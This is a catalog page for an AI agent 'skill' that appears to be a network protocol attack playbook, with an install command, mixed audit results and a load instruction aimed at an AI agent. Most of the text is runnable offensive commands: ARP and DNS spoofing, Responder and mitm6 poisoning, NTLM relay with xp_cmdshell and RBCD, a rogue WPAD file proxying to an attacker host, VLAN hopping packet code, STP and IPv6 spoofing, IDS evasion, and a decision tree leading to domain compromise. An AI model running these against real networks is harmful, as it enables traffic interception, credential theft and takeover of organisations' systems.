network-protocol-attacks
Network protocol attack playbook. Use when exploiting layer 2/3 protocols including ARP spoofing, LLMNR/NBT-NS/mDNS poisoning, WPAD abuse, DHCPv6 attacks, VLAN hopping, STP manipulation, DNS spoofing, IPv6 attacks, and IDS/IPS evasion.
How do I install this agent skill?
npx skills add https://github.com/yaklang/hack-skills --skill network-protocol-attacksIs this agent skill safe to install?
- Gen Agent Trust Hubpass
This skill is an expert-level offensive security playbook for network protocol exploitation, covering techniques like ARP spoofing, LLMNR poisoning, and VLAN hopping. It provides detailed workflows for using established tools such as Responder, bettercap, and mitm6. The skill is intended for authorized security testing and includes defensive remediation guidance.
- Socketfail
2 alerts: gptMalware
- Snykfail
Risk: CRITICAL · 3 issues
- ZeroLeakspass
1 finding · Score: 86/100
What does this agent skill do?
SKILL: Network Protocol Attacks — Expert Attack Playbook
AI LOAD INSTRUCTION: Expert network protocol attack techniques. Covers ARP spoofing, name resolution poisoning (LLMNR/NBT-NS/mDNS), WPAD abuse, DHCPv6 takeover, VLAN hopping, STP manipulation, DNS spoofing, IPv6 attacks, and IDS/IPS evasion. Base models miss the chaining opportunities between these attacks and the nuances of modern switched network exploitation.
0. RELATED ROUTING
Before going deep, consider loading:
- tunneling-and-pivoting after establishing MitM position for traffic redirection
- ntlm-relay-coercion for relaying captured NTLM hashes from poisoning attacks
- unauthorized-access-common-services for exploiting services discovered during network attacks
- traffic-analysis-pcap for analyzing captured traffic from MitM
Advanced Reference
Also load NAME_RESOLUTION_POISONING.md when you need:
- Detailed Responder/mitm6 configuration and workflows
- NTLM relay target selection and chaining
- Credential format analysis and cracking priorities
1. ARP SPOOFING
Gratuitous ARP — MitM Positioning
# arpspoof (dsniff suite)
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t VICTIM_IP GATEWAY_IP &
arpspoof -i eth0 -t GATEWAY_IP VICTIM_IP &
# ettercap — ARP poisoning with sniffing
ettercap -T -q -i eth0 -M arp:remote /VICTIM_IP// /GATEWAY_IP//
# bettercap — modern framework
bettercap -iface eth0
> set arp.spoof.targets VICTIM_IP
> arp.spoof on
> net.sniff on
Selective Targeting
# bettercap — target specific hosts, avoid detection
> set arp.spoof.targets 10.0.0.50,10.0.0.51
> set arp.spoof.fullduplex true
> set arp.spoof.internal true
> arp.spoof on
Detection Indicators
- Duplicate MAC addresses in ARP table
- Gratuitous ARP storms from non-gateway IPs
- Tools:
arpwatch, static ARP entries, 802.1X port authentication
2. LLMNR / NBT-NS / mDNS POISONING
Responder — Credential Capture
# Basic poisoning (LLMNR + NBT-NS + mDNS)
responder -I eth0 -dwPv
# Key flags:
# -d Enable answers for DHCP broadcast requests (fingerprinting)
# -w Start WPAD rogue proxy
# -P Force NTLM auth for WPAD
# -v Verbose
# Analyze mode only (passive, no poisoning)
responder -I eth0 -A
Captured Hash Formats
| Protocol | Hash Type | Hashcat Mode | Crackability |
|---|---|---|---|
| NTLMv1 | NetNTLMv1 | 5500 | Fast — rainbow tables viable |
| NTLMv2 | NetNTLMv2 | 5600 | Moderate — dictionary + rules |
| NTLMv1-ESS | NetNTLMv1 | 5500 | Fast — same as NTLMv1 |
# Crack captured hashes
hashcat -m 5600 hashes.txt wordlist.txt -r rules/best64.rule
john --format=netntlmv2 hashes.txt --wordlist=wordlist.txt
Relay Instead of Crack
# ntlmrelayx — relay captured NTLM to other services
ntlmrelayx.py -tf targets.txt -smb2support
ntlmrelayx.py -t ldaps://DC01 --delegate-access # RBCD attack
ntlmrelayx.py -t mssql://DB01 -q "exec xp_cmdshell 'whoami'"
3. WPAD ABUSE
# Responder with WPAD proxy
responder -I eth0 -wPv
# WPAD flow:
# 1. Client queries DHCP for WPAD → DNS for wpad.domain.com → LLMNR/NBT-NS
# 2. Responder answers with rogue wpad.dat
# 3. Browser uses attacker's proxy → forced NTLM auth → credential capture
Manual WPAD PAC File
// Rogue wpad.dat content
function FindProxyForURL(url, host) {
return "PROXY ATTACKER_IP:3128; DIRECT";
}
4. DHCPv6 ATTACK — mitm6
Even on IPv4-only networks, Windows clients send DHCPv6 solicitations by default.
# mitm6 → DNS takeover → NTLM relay
mitm6 -d domain.com
# In parallel: relay captured NTLM to LDAP(S) for delegation
ntlmrelayx.py -6 -t ldaps://DC01 -wh fakewpad.domain.com -l loot --delegate-access
# Attack chain:
# 1. mitm6 answers DHCPv6 → sets attacker as IPv6 DNS
# 2. Victim DNS queries go to attacker → WPAD redirect
# 3. Forced NTLM auth → relay to LDAP → create machine account or RBCD
Key Conditions
- SMB signing disabled on targets (for SMB relay)
- LDAP signing not enforced on DC (for LDAP relay)
- Domain Computers quota > 0 (for machine account creation, default: 10)
5. VLAN HOPPING
Switch Spoofing (DTP)
# yersinia — DTP attack to negotiate trunk
yersinia dtp -attack 1 -interface eth0
# frogger.sh — automated VLAN hopping via DTP
./frogger.sh
# Sends DTP frames → switch enables trunking → access all VLANs
# After trunk established:
modprobe 8021q
vconfig add eth0 TARGET_VLAN
ifconfig eth0.TARGET_VLAN 10.10.10.1 netmask 255.255.255.0 up
Double Tagging (802.1Q)
# Craft double-tagged frame: outer=native VLAN, inner=target VLAN
# scapy:
from scapy.all import *
pkt = Ether()/Dot1Q(vlan=1)/Dot1Q(vlan=100)/IP(dst="TARGET")/ICMP()
sendp(pkt, iface="eth0")
# Limitation: one-way only (responses go to real gateway)
# Effective for blind attacks (e.g., targeting a server)
Mitigation
- Disable DTP:
switchport nonegotiate - Set native VLAN to unused:
switchport trunk native vlan 999 - Prune VLANs: only allow needed VLANs on trunk ports
6. STP MANIPULATION
Root Bridge Claim
# yersinia — claim root bridge with lowest priority
yersinia stp -attack 4 -interface eth0
# Send BPDUs with priority 0 → become root bridge
# All traffic flows through attacker → MitM
Topology Change Attack
# Send TC (Topology Change) BPDUs → force MAC table flush
yersinia stp -attack 1 -interface eth0
# Switches flood all ports temporarily → sniff traffic
Mitigation
- BPDU Guard on access ports
- Root Guard on designated ports
spanning-tree portfast bpduguard enable
7. DNS SPOOFING
DNS Cache Poisoning
# bettercap DNS spoofing
bettercap -iface eth0
> set dns.spoof.domains target.com, *.target.com
> set dns.spoof.address ATTACKER_IP
> dns.spoof on
# ettercap DNS spoofing (via etter.dns config)
echo "target.com A ATTACKER_IP" >> /etc/ettercap/etter.dns
ettercap -T -q -i eth0 -P dns_spoof -M arp:remote /VICTIM// /GATEWAY//
Kaminsky Attack Variant
Flood recursive resolver with forged responses for random subdomains, each including a malicious authority section pointing the NS record to attacker-controlled server.
8. IPv6 ATTACKS
Router Advertisement Spoofing
# Send rogue RA → victim configures attacker as default gateway
atk6-fake_router6 eth0 ATTACKER_IPV6_PREFIX/64
# THC-IPv6 suite for comprehensive IPv6 attacks
atk6-parasite6 eth0 # ICMPv6 neighbor spoofing
atk6-redir6 eth0 ... # Traffic redirection via ICMPv6 redirect
SLAAC Abuse
# Advertise rogue prefix → victim auto-configures IPv6 address
# Combined with rogue DNS (RA option) → full MitM over IPv6
# Windows prioritizes IPv6 over IPv4 by default
9. IDS/IPS EVASION
| Technique | Method | Tool/Flag |
|---|---|---|
| IP Fragmentation | Split payload across fragments | nmap -f, fragroute |
| TTL Manipulation | Set TTL to expire at IDS but reach target | fragroute |
| Encoding Evasion | URL/Unicode/hex encoding | Manual, custom scripts |
| Session Splicing | Split TCP payload across segments | fragroute, nmap --data-length |
| Timing-Based | Slow scan to avoid rate-based detection | nmap -T0, nmap -T1 |
| Decoy Scanning | Mix real scan with decoy source IPs | nmap -D RND:10 |
| Idle/Zombie Scan | Use idle host as scan proxy | nmap -sI ZOMBIE_IP |
# fragroute — fragment and reorder packets
echo "ip_frag 8" > /tmp/frag.conf
echo "order random" >> /tmp/frag.conf
fragroute -f /tmp/frag.conf TARGET_IP
# nmap evasion combinations
nmap -sS -f --mtu 24 --data-length 50 -D RND:5 -T2 TARGET
10. DECISION TREE
Network access obtained — want to escalate via network attacks
│
├── On same broadcast domain as targets?
│ ├── YES → ARP spoof for MitM (§1)
│ │ └── Capture plaintext creds or redirect traffic
│ └── NO → need VLAN hopping first (§5)
│ ├── DTP enabled? → switch spoofing
│ └── Know native VLAN? → double tagging
│
├── Windows environment?
│ ├── LLMNR/NBT-NS enabled? (default YES)
│ │ └── Run Responder (§2) → capture NetNTLM hashes
│ │ ├── NTLMv1? → crack fast or relay
│ │ └── NTLMv2? → relay (§2) or crack with rules
│ │
│ ├── WPAD configured or auto-detect? → WPAD abuse (§3)
│ │
│ └── IPv6 not hardened? (default) → mitm6 + ntlmrelayx (§4)
│ └── LDAP relay → RBCD → domain compromise
│
├── Need DNS control?
│ ├── MitM already established? → DNS spoofing (§7)
│ └── DHCPv6 available? → mitm6 for DNS takeover (§4)
│
├── Managed switches with weak config?
│ ├── BPDU Guard off? → STP root bridge claim (§6)
│ └── DTP enabled? → VLAN hopping (§5)
│
├── IPv6 attack surface?
│ └── RA spoofing / SLAAC abuse (§8) → MitM over IPv6
│
└── IDS/IPS in path?
└── Apply evasion techniques (§9) — fragmentation, timing, encoding
How can the creator link this skill?
Add the canonical catalog link to the repository README so users can inspect current installs and available audits. The publishing guide covers the complete discovery path.
<a href="https://skillzs.dev/skills/yaklang/hack-skills/network-protocol-attacks">View network-protocol-attacks on skillZs</a>